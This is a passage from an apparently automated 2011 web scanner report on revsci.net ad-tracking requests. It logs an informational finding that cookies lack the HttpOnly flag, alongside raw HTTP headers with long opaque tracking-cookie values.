VrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; rsi_us_1000000="pUMVIzlHMAYY1A3HkAz1jyt3tlSj9WvRyFxc7CYdMac7y9zNu2VAbbuAi9eNwCUC8Wl4wOOguOEurHKK5ymr+WMVxLrjQRwI/BIpxOPADBg2yufgfgLgTu5j4fLTEQPVeuiSCftktrpjidSb3tKRT16/qhDddfs4YO14yGwo3mknI3Zsage7Hp/us89s/r8sHOwuTFP/CGJvF0CBpAcFUrFpcSeddZugAt2/rJIEsl5lFIWoWu0NxYgUpdu1epUcSWwK6nXWutDM3kjbS6MwxlDUEHsfiC/tX/ajBDdyf6FoclGT9hYvZ6yHELxTGV52+gM/KNJ7HFfCnqBSHyO9h6K2IG72DZG1gnriBn20N4unmsPk3dyDXHODxND8UIYEdTEJhqUeX0XH8ufbk9oKEcwKphMNOSzMjsdEazx5OG/X/voubSxcMfLggv+AZDDDoXbGHiM/jsG6UCatRfU6qwA/nFJ2HLM4H6Vwy6n5QW6iEtTBjhACVrgjSJ1n0sxNueMqqowm9U9MjFONHQUR6SKVk9owlMGLCJ812+Zr34276nVTgfXxsLZ0YiftaKJuIZ0xP8YY9WkMkt9n8RFkDTls6k1BC7v58lSYgZALXT+bKUXFsuSpAsJNWsLmyWs+XDUQmVb0hR/fcPrwgVJhI4ZuwOsX3RWEdg83luatgZ5+TKYM1It/I+VexFONR38x4qDP9iS3Y7dK1r0pZRdkAEwT968QaKX4dePJx+FsOolAvtn/m15h6VbBjCGtzXDFJsq0asZ+2cixyyycOZ0q9ZO0pv1gaqV+NlgOEwszeFk1G7zGPKs7Hn4CRU8RwJ3PC192d/zQh845eP57+B+obaWwyCioHG3FOYiiZ8MJGnrYDWOTh6FFkJ/lnooujf2FtYlU9jKpfaACfJAKJrmg0lUhzCxs3khsT9cbaSuhk/AIXUky6y/7/4/TdCE/G9rDhkcJMYJhTogOtss3qAESQMf2AR/2GXUB9mpl5kBSpRkjsPnWAmqvOIHRkFGc7ucL8rPj3ymJwl+PX2ItsAHmMq2EnmNyakB+vuFAuT9h5l25oI1IwUVAVoafxDxIVvNI3J0B6g0A1HzsmnY5z077NnItIJh3xRNWe/iXIU+CrYWmkPOTjLSuO4lfoF4riXFUJbckXujjUDMTlq5PEpGKQnlA56Zfg9qW912fdgXl6AA2hOYwMsuwUbGDBMFhQ6XfL09iRogg1WfYzxZ2Np6PvGSDERHaUwP8t0euXTq2Q3eSJ4ppXnS6iCAnGFPbCsrGjyRLOmYtFL2Im/UUecMgAjO9mIZcYqqjLobxUzRXN7iqDqCwIOmEyWQ0dYPcKR9laCXq+0nRJKCUAJQnStj+/JYwWMQHmQKF2Ca/hmc4+baAz6xM2NKxfNlISgW/KhdUaqQ38MUa0a1KSbc9v0K8egn0NfsoKiOYm7vbWfw20dVvNkxG4pyhchNYi+IfuzopLXmexn1k8T0TEIckb31ULLX5aO+Lk6yh9ODYCQQrLrxanBsN1+8zTf3vg5v7l3gwefT81PMYeXwyan8ecHtrQGmGtzs3pQzd"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_gNkk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP1409BuHIMpjax3xDh/u5UG2vMqKTmRn5okelSXvknuZNZnDfOdzd0q7tfEV6W8KZgxAU1zJYbo4ySeJozi5LFmkkf+4Y6bYkWV1SZizgBMzp3EcFgE6G017VVW6p40CmQyH3jOB6M3uOveMeh2iY1ZBv1vMKSAJATDcXxMRze99i26Jb5EA9ZvBUBQCOLNlZdc1PBr590JxMxK3kemOgUYxWkvCQzvRoZGOhKIU2nYFQXpcFUnxOd7CqAwPNPRcsaqmqd5bH88hbVLgU4/pNIA5yuEJcIPeeGg9+bx5k/IfrFHRjft0ZIZ6+a8LvbP1F9f20smeVrZaOl7PWZnEwLjR8bSow8IznBeM4kH0Wps6j79bZjGkjO9FAdDgoOcv54zgmd74nlmcHZjx6RErrrC/34fPQ0fszJywMxzzQnWrshsE4MUOKoplfl+lTQ4MhWXJ+Yrt0vZS3/S4XoeqXFwxoj4lV6OnNa8UY1pEUlhONk+RELYIM93uJhP1fFj9rXET0X3Q38/0NNfnQ9iEUbhNC336gzi4gveVg2HsUq6Fymuu/jUVOVz5D6uR3kKA0uMOJte/TrlIJB9uKJTB3Hkj+OteqSnSo=; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:55 GMT; Path=/
Set-Cookie: NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf417&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 15:36:55 GMT; Path=/
Set-Cookie: rtc_-pbG=MLvn9jM1Jhpr5oaeFy5cQLrcDcgxJTbyaQGzwLZBotunayc2Fw/K4guEx48AnknPEndoby22cGHsdFck1iBn3DUobt55rCByo31GJyETeLJl0qvf6Jn2sxG2z0iT2bbcjJrHe8GBksW4qcll5AeaXjmGUDbRWU08YZg4edF2cBe9DspCxhQ7361ZfEotlSYP+MqBfL/w57DfCdIuJhyfxWDC+F4W0x32WtybJIRC8CLSlbxi3CC7anzdModTvAzrQfv7i4yJ4tfv23hElzRAo45NzalLx0pI92HjAlvLltXQMEeD59j8HSg5zMzrXkbxPGkDuQO8CD5Uy0X440+GhUuEBlTuXncKpo59or+teixmWGkw4h82xTsJxVA32RlmPlxfLd0DPboL+ScpDqJ7EyCMxiPZjPOZSZb/P18d0B6dPfXACkwW2b7JGqZgtJefS8MvIIRVOAWyGKSddY53IBjTDonVRQtAhow+gjBCkr32CoZhiC2o7W53iumA5JAaEKemP4CuriZ3Oh92wceTFssmiHV03P3TnzqwiMvWyGZOLcS0b36BgNTGDP/oHEgI419GHyNYPYePnsZhRU1jkIemN9OP89YbLzetkOaBNGBt72K+i32KTgFnJgkzRmDcwHADuX26Np6HbpwBpsafN0Td8Ege83IpcLfdCWoH/FOES7/sgvItqGMQtpNCesMiY1/hRPOhuADgEqQtp5XbMpu7Sw9desmqxa5M111GnRnmop62u913vIbogl+ZCoarCoWnW2EKAnaKevDI9CtQiAnPFAcM5XjabtRUvhL/d4fIh8imLNMmzGIfpvWHViSKdYGbIHfNIJWraMC4Vahh9asGqff/FFdlJKXDuHnrmiBy7VCK4q0bmyQiOi23Mbp4rMJ7ZFfExGjh0Deg21XrgVEJygAodlMrUFsYh3x+JL6tM82EyxlrjwnPSOPUficZAt2qOvCpWC4d70ONc6DbRXPel2qVWr9R4NR8spx21DQ329eEMe+a453iMV59kioeuCH7mnuTVCY0BzVfb8yQMpXNmGdq8018efv6cy0UrgNLG4Vvjwd577Jg6h+lwSUDxcDbZmAkDmKadjdnDBljgFfsyAsOrNyuDxbJ8TdkZR9gCAtjvsiBzxEVmOrYT6HzTeMLPHrrCPn/1PB0XdhHCeOuIM86Wd1eiYbwPVZOGYoxestkxrwvlBWmqS4zqiJgxGtklz6N9a8yWObB9QeQjynHLDznE3of6mhDRuDmkgGSe0nOe1faUBKdQj7BlaoONO99Gh3ocsQdQ6RyGiPqI42toAtkHfnwxlmtICBtRaKNsHXLNHetdA+4dp7vxXQ5tu/2hEFKF66SpSaQzQl8TB5m7kte9CE3/B32F347rQ4DCFhYj24E4ZyjUYbpe0M+kBzn/QykOyL/w0irDgy6ZQt/u+a1DUBqXRV0/AJO6NnbAxb2eDhLttfyzv258JjuenKMZ5xPt3XAFLN1oSvz6mF7fh50GXHUdoEQgkSBcZ1PS+wIfJy105Aol0wmkUqPh+kfoC4g82jad8JgHmsdZYx5FOIFhoBZb+snjaACRtXREaWla+3A8eufLP7nR7KLQvyYASC7SpnFhReJFBeehSPWU+4l2YWu2IunhD73tvQqrqM7UaWZW5R9IxXZ6BE+hyLrdBoYsxr5qgsF3QHqO2E6n0mUTNwl0lx9cFq7moVZ2JSzSIqGz8wv2TOVDrWCtgahQ4AuqpA7rev3wwCJJWC95V2UKuatoLe7dfcQ+Denb480wEG/t0RgjmDcYpnL90BoFiSV64XacUbSb6smN2yRmAHTsLTLO0QQnvg5vKkgJRJTsJ9hI4mqRmETR1BUZBdR48YLqpyeBqmK4NH5NH2LRq0bdNdk2U0gw4eAFmkAPgZUmniQzEOz; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:55 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:54 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

11.46. http://pix04.revsci.net/J06575/b3/0/3/1003161/498787488.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/498787488.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/498787488.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwPKJxC5gZVtCsylMowZVqFba93uE88QpuDb5ZC9UQMpBwKgJsgsK/5y/VyTHjCWG4SoGRm5dWoFU7PHkVBVRsmPo8ulpSziaGfT5EodlaMm+vF2r3l/c95LrsITXHJ2I1zqJbIwuKe5PN2KgWbN8mNcvi/u7eq2U+HGkHowc+nxezhSslqi3VLe86ut3/CbD7ii3elUpunmujKWIZxPJ9ltUcyTIwhrqdTnfK90aiYPaKzaUqqi1CDohU8VolCkQ/PbXsT0D64lEj1zTEx0fYZK083py+2GEeADpri0HRNaxF300KQuDjQ6yz58+/gEwpcHSlXrUjeL+Q+A2KWMxSaXE3vLUGnK762eDMdGneRi4Z5R/PDaDROL3MikWyJfZq3hJmDPIcsKjZ7WKze1UFa9+VR6Daqv9+IX/j69KWQiiGHN62ZLnTvJDkw/+LGzEdm+xrncZe/MTLl/tzGbC6OZ0xyhOwOxLvpW4OEBvo1vFPZqQ8/4dUIZ9c/tMlDDqcpEk6cZrfGczZNcJ07uJ6oe4iZsjKWewFYiQsK/rbrMrdrfQ/1Su1smIgKxV/Y7oSQzXAjnycWIGfDTAndbGihpi8nFzveXcTFNP5ap414bqma34KoXwzYOq2sc7L4a4qOCmcRiLxjHOc0PPPoNmxhfMWndLuIWTqiOZ4fC0D3IIa7verqW/TDSuCVZ4/orK2q93e17LqkrpOdscw4BbMow6IH7X1OwrXgdjH2/vC9ieEfItiNwQm/uKzk/rnEcVobls6XLls68BM8P9BLC9CTJ6FW1a2w9AOYL2XuoVlnxrjqQPEq4TJtb4mppTU9JrmC9dDEMVwLVNX2aP+Qizf0csOzMy1yU7/fW8h2V1Fh2MeGTjho24iDQqgz4BHQnU7cajGik/56FuARVHL/klg+jUrgSyRsWErWs4tagMBICsdSAiN4tHzJKNsWD1RNYyM2mz7OtgN34QjNO13raQh9KK+UWgc5rtxG0dJuMCoIB4X/hheL8GjEwr+reg/R3m7iuStF0nM5KEJf8qN3Jd3KNrW29NASW0ZNG8TRP3WpdNC1EXEgHYHAjK5b8qNIxRpUqD7btnu/7mzW1a5L/HqPfjtu2qmBWPXPU0k8BdOhAlQGKzABVcTeH7d4Na8CZMdKgNzi52xXhAHqzGYP6Jv3XrXlkJmmp8JzGb+Gmv13RIc2KjMZHqcXB+aXLsPdbwjNmb9lJ2+oUGpQZgH12jfK8uKuHOnVxIzQbugywkDX47CIxRV5y+bCwKY89nBay4+AXw/XyremaQ19e7j9A65Xeqz8nK6eezLWs2STWqnAYxnLskLHMzo52qf22tCqcGXq7CGYNR5tfPHBaQhbi8L0bj1ToQM3w0EEhFavgGW8SLtdUODbZFMwPPZ9LSkHDkpM0wf0Hxef3U9E+m2XvWGHg3cU92f5el+wGICUvGb+KsKCaxvvG7KIz2Thse+5WRvmy6IkCYwqk9KHBsTqashxrqRTPDf+cLSf8Y3dw=; rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1NhVrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; rsi_us_1000000="pUMVIzlHMAYY1A3HkAz1jyt3tlSj9WvRyFxc7CYdMac7y9zNu2VAbbuAi9eNwCUC8Wl4wOOguOEurHKK5ymr+WMVxLrjQRwI/BIpxOPADBg2yufgfgLgTu5j4fLTEQPVeuiSCftktrpjidSb3tKRT16/qhDddfs4YO14yGwo3mknI3Zsage7Hp/us89s/r8sHOwuTFP/CGJvF0CBpAcFUrFpcSeddZugAt2/rJIEsl5lFIWoWu0NxYgUpdu1epUcSWwK6nXWutDM3kjbS6MwxlDUEHsfiC/tX/ajBDdyf6FoclGT9hYvZ6yHELxTGV52+gM/KNJ7HFfCnqBSHyO9h6K2IG72DZG1gnriBn20N4unmsPk3dyDXHODxND8UIYEdTEJhqUeX0XH8ufbk9oKEcwKphMNOSzMjsdEazx5OG/X/voubSxcMfLggv+AZDDDoXbGHiM/jsG6UCatRfU6qwA/nFJ2HLM4H6Vwy6n5QW6iEtTBjhACVrgjSJ1n0sxNueMqqowm9U9MjFONHQUR6SKVk9owlMGLCJ812+Zr34276nVTgfXxsLZ0YiftaKJuIZ0xP8YY9WkMkt9n8RFkDTls6k1BC7v58lSYgZALXT+bKUXFsuSpAsJNWsLmyWs+XDUQmVb0hR/fcPrwgVJhI4ZuwOsX3RWEdg83luatgZ5+TKYM1It/I+VexFONR38x4qDP9iS3Y7dK1r0pZRdkAEwT968QaKX4dePJx+FsOolAvtn/m15h6VbBjCGtzXDFJsq0asZ+2cixyyycOZ0q9ZO0pv1gaqV+NlgOEwszeFk1G7zGPKs7Hn4CRU8RwJ3PC192d/zQh845eP57+B+obaWwyCioHG3FOYiiZ8MJGnrYDWOTh6FFkJ/lnooujf2FtYlU9jKpfaACfJAKJrmg0lUhzCxs3khsT9cbaSuhk/AIXUky6y/7/4/TdCE/G9rDhkcJMYJhTogOtss3qAESQMf2AR/2GXUB9mpl5kBSpRkjsPnWAmqvOIHRkFGc7ucL8rPj3ymJwl+PX2ItsAHmMq2EnmNyakB+vuFAuT9h5l25oI1IwUVAVoafxDxIVvNI3J0B6g0A1HzsmnY5z077NnItIJh3xRNWe/iXIU+CrYWmkPOTjLSuO4lfoF4riXFUJbckXujjUDMTlq5PEpGKQnlA56Zfg9qW912fdgXl6AA2hOYwMsuwUbGDBMFhQ6XfL09iRogg1WfYzxZ2Np6PvGSDERHaUwP8t0euXTq2Q3eSJ4ppXnS6iCAnGFPbCsrGjyRLOmYtFL2Im/UUecMgAjO9mIZcYqqjLobxUzRXN7iqDqCwIOmEyWQ0dYPcKR9laCXq+0nRJKCUAJQnStj+/JYwWMQHmQKF2Ca/hmc4+baAz6xM2NKxfNlISgW/KhdUaqQ38MUa0a1KSbc9v0K8egn0NfsoKiOYm7vbWfw20dVvNkxG4pyhchNYi+IfuzopLXmexn1k8T0TEIckb31ULLX5aO+Lk6yh9ODYCQQrLrxanBsN1+8zTf3vg5v7l3gwefT81PMYeXwyan8ecHtrQGmGtzs3pQzd"; rsi_segs_1000000=pUP148mheXIQT7uItGF25jD9QihE8IYbNKetsiW8kgFisncWnhVMqxlWq0ucAHjnyThQpuvVI9kMh8n1FZRZG3xOHqJgzQCOjhUe97Ueo/oV8rFkwdsAM2inFD5dxpd+U+E093xPsrix3+OZNio25HCvnvFhZhWthmBTyPD4RapFCIEu2lOw/IIwYkz+6mxP7SBJDiF24gicYCle3d6HY7QZbkm+odQJLW8+PWrecDnI1ZKZHQzsDKye1ebNlG+F0O7KsVRUWc2lZiRsgG+YnEnhhOgUjCqIi4i4q43MBu7CNjxFeYUhxsnubRYFgIe24n3W85w7P/Po0VHFfykAgOVvK83VaDdZKWD/KIVe8dqKzyeln73lCPFzE9HjxKDwsj/BfiMyOXhh1G8dLTLCbJhGOrlytpc84LHyZP+KVwJJNYdAUHQMimUPLIaj2XtIzdmkiZElC6E3vZ7BWA6vfqDqyz/UN2NTNZCl2XEU5yfs8jUdCq/L6cLps1Tz6jEWB3nM03mUZ7lIOmLJZpYScvQJPNi6Qhp+d6GkBErOgH5qxczpWuDAoetyw48xMGgXARtZi/Z7txvmN3uOVuc5NDiDAySPpWWPnSs=; rtc_8DRJ=MLvn9jM1Jhpr5oaeFy5cQLrcDcgxJTbyaQGzwLZBotunayc2Fw/K4guEx48AnknPEndoby22cGHsdFck1iBn3DUobt55rCByo31GJyETeLJl0qvf6Jn2sxG2z0iT2bbcjJrHe8GBksW4qcll5AeaXjmGUDbRWU08YZg4edF2cBe9DspCxhQ7361ZfEotlSYP+MqBfL/w57DfCdIuJhyfxWDC+F4W0x32WtybJIRC8CLSlbxi3CC7anzdModTvAzrQfv7i4yJ4tfv23hElzRAo45NzalLx0pI92HjAlvLltXQMEeD59j8HSg5zMzrXkbxPGkDuQO8CD5Uy0X440+GhUuEBlTuXncKpo59or+teixmWGkw4h82xTsJxVA32RlmPlxfLd0DPboL+ScpDqJ7EyCMxiPZjPOZSZb/P18d0B6dPfXACkwW2b7JGqZgtJefS8MvIIRVOAWyGKSddY53IBjTDonVRQtAhow+gjBCkr32CoZhiC2o7W53iumA5JAaEKemP4CuriZ3Oh92wceTFssmiHV03P3TnzqwiMvWyGZOLcS0b36BgNTGDP/oHEgI419GHyNYPYePnsZhRU1jkIemN9OP89YbLzetkOaBNGBt72K+i32KTgFnJgkzRmDcwHADuX26Np6HbpwBpsafN0Td8Ege83IpcLfdCWoH/FOES7/sgvItqGMQtpNCesMiY1/hRPOhuADgEqQtp5XbMpu7Sw9desmqxa5M111GnRnmop62u913vIbogl+ZCoarCoWnW2EKAnaKevDI9CtQiAnPFAcM5XjabtRUvhL/d4fIh8imLNMmzGIfpvWHViSKdYGbIHfNIJWraMC4Vahh9asGqff/FFdlJKXDuHnrmiBy7VCK4q0bmyQiOi23Mbp4rMJ7ZFfExGjh0Deg21XrgVEJygAodlMrUFsYh3x+JL6tM82EyxlrjwnPSOPUficZAt2qOvCpWC4d70ONc6DbRXPel2qVWr9R4NR8spx21DQ329eEMe+a453iMV59kioeuCH7mnuTVCY0BzVfb8yQMpXNmGdq8018efv6cy0UrgNLG4Vvjwd577Jg6h+lwSUDxcDbZmAkDmKadjdnDBljgFfsyAsOrNyuDxbJ8TdkZR9gCAtjvsiBzxEVmOrYT6HzTeMLPHrrCPn/1PB0XdhHCeOuIM86Wd1eiYbwPVZOGYoxestkxrwvlBWmqS4zqiJgxGtklz6N9a8yWObB9QeQjynHLDznE3of6mhDRuDmkgGSe0nOe1faUBKdQj7BlaoONO99Gh3ocsQdQ6RyGiPqI42toAtkHfnwxlmtICBtRaKNsHXLNHetdA+4dp7vxXQ5tu/2hEFKF66SpSaQzQl8TB5m7kte9CE3/B32F347rQ4DCFhYj24E4ZyjUYbpe0M+kBzn/QykOyL/w0irDgy6ZQt/u+a1DUBqXRV0/AJO6NnbAxb2eDhLttfyzv258JjuenKMZ5xPt3XAFLN1oSvz6mF7fh50GXHUdoEQgkSBcZ1PS+wIfJy105Aol0wmkUqPh+kfoC4g82jad8JgHmsdZYx5FOIFhoBZb+snjaACRtXREaWla+3A8eufLP7nR7KLQvyYASC7SpnFhReJFBeehSPWU+4l2YWu2IunhD73tvQqrqM7UaWZW5R9IxXZ6BE+hyLrdBoYsxr5qgsF3QHqO2E6n0mUTNwl0lx9cFq7moVZ2JSzSIqGz8wv2TOVDrWCtgahQ4AuqpA7rev3wwCJJWC95V2UKuatoLe7dfcQ+Denb480wEG/t0RgjmDcYpnL90BoFiSV64XacUbSb6smN2yRmAHTsLTLO0QQnvg5vKkgJRJTsJ9hI4mqRmETR1BUZBdR48YLqpyeBqmK4NH5NH2LRq0bdNdk2U0gw4eAFmkAPgZUmniQzEOz; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_8DRJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP140+huQIMp6aIYFMFwqgWeIORGubrqCfUW+jAEw/k86fOUkLBrkqruxUK6pw26DoqglBBbZcHQw/BQ3ETC90T3xVW/k94jPzDisxc1qUSPzP1W/5KJ+SuMwS1cGXU2WThy715UsCX3oOs1TnDs2Nod6SswWDEE4NEmp0MDF61Na0kE94w4AtHiyDftLB4ogw3As3DRaWjEynunLfYNB3YmeW1b2fEkOddDeiqksWnYHDCwWxJfg3JeA6UuCsCgYD4zMlQ45adSSRSxBpu0UmJDYX3l0qRD5J8lODoCv4adidCtN4IceFPVUFHY9FZY3/PJk2dVbDuFafEZzrna/Oq3tH0UlHoUXROa7JpFrDGgnzG6RmNPT9xswMJpJ/4/LgGHZeDf4qGPW4sud/IG+z2/3Ui/IE7aVfW1hU0LSLHXkJnGr4JGazsvemcLYhZIKPfDohSpqnRYnFDNeUyObH/3DqIMckjLKgBBocNxTXrrKkwOckpU45W2v0U3IyCEnLU2bzXWRrtK+aB/hmuSIKssoShQUgkJSMk5D4gDHF0Lop44WgcJdumDusXVvy8Pf7a7oGeSPoWB36tIetGID0g0w==; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:17 GMT; Path=/
Set-Cookie: NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf469&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 15:38:17 GMT; Path=/
Set-Cookie: rtc_Wrpy=MLvn9jM1Jgpr54aeixlPU0iJzD/A1gw/s7z5FPHjTbcjQe6SyjZfNBHlcl0kJ6xb7KxXS0n/wkRC4loA/0F2wkRHZcOAJEq4Dwzt2Om/1LFFe33wUlIYHWgk3JIf+57YTIrZsByUWltzFrRLWQkJwcRM8WAjEeY4ROXqVRqWqlFCk3HzeZvB7UqDKiMm+em65LEdFCubQva+uhYCU4TAdQsM9NhX+ug+P8ELz2+3GiBBzM1wCymg8+GPH7Y69+xviE6Hqdz7ujIwlbK5VxRJUDXsPScW0OuLen2n5XNIVQWV0a6zZscEKSvJFJ+qcEq4+Z9S+ATaANDLtiqSIrA0MATfpgfCqefcfJ5CLtyChbBOQcNQdYq/ZTXHQ2nKTygG5ksEGSLhhMLTH3nLtfSmf7myMaOLY9aJ02OHl/Fu6Y2wQS84P004/LHAfRc/BEHwKgDZY8E4JJEL71uMwA2eeEdPVYKPG/DduFctll24uU8j2YMNsWENRh4hK5IbB0czI2gWw5thigBcBZIP3XJrVHNnhsObnvvXwCKWWfWdYI3v4TRgyMWKw6d8zcNUriJHuzJ6gN4inlSjVhNBgUR06cCYuTzRv8kU21/Nb5c0ZNbuKLudEWUgq1+Mw5po5VTwWXV0xjFGISH481xxkQrS9f+z4zfknHQSyR966h01FYMsS7zsQtcKlrarNO/PXZK/VVXoeRIalnaoFkvriwrBt9uojqEElV6GOWaCOj9t8u2MX6+ewAiFR8qEF4hCbHQN2w3i7zZxx9jglR+zktHHdI+AaME6nwVOuSWRSMmbBOJQiBGVEKcZZtrixm6A0EkvkXGQhi1mkiDJt28P6lC1YPWnqEjsa1VFxuyj6OhVtpRJH+e2y6R4/cnzJ+CfcLnbecp3jLkBN3A9WKkj160OlWZ6bQrrtnaiNyLK+hjDarrW1/e7DkcyYpLMH7VZ0PoS679JljmXMuDgV63vGcd/l2Xeq07wDl5+804DPNFxxXEWxZK2JxenUyorOZ05lAucMiUYnwDH43x2r3zq4+jzvmUOijuNnDDQC6c2U37Xp4k3g6we4z0Ry3aft2v